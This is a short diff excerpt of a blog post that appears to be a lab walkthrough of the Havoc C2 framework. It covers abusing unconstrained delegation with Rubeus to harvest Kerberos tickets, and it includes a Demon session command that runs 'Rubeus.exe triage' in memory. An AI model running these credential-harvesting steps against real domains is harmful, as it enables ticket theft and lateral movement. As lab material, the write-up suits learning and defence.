pikaroot/pikaroot.github.io/_blogs/2023-02-25-HAVOC_Framework.md

 msds-supportedencryptiontypes  : 28
 ```

-After knowing **WORKSTATION-02** are set under unconstrained delegation, [`Rubeus.exe`](https://github.com/GhostPack/Rubeus) will be heavily utilized in this section, especially kerberos topics.
-By extracting and harvesting the kerberos tickets, use `Rubeus.exe triage` to grab all current tickets contains parameters such as login ID (LUID), domain username, services, and end time.
+For exploitation, [`Rubeus.exe`](https://github.com/GhostPack/Rubeus) will be used to extract and harvests the kerberos tickets.
+Use `Rubeus.exe triage` to grab all active tickets containing parameters such as login ID (LUID), domain username, services, and end time.

 ```
 06/03/2023 15:31:18 [5pider] Demon » dotnet inline-execute /home/havoc/Desktop/Tools/Rubeus/Rubeus/bin/Debug/Rubeus.exe triage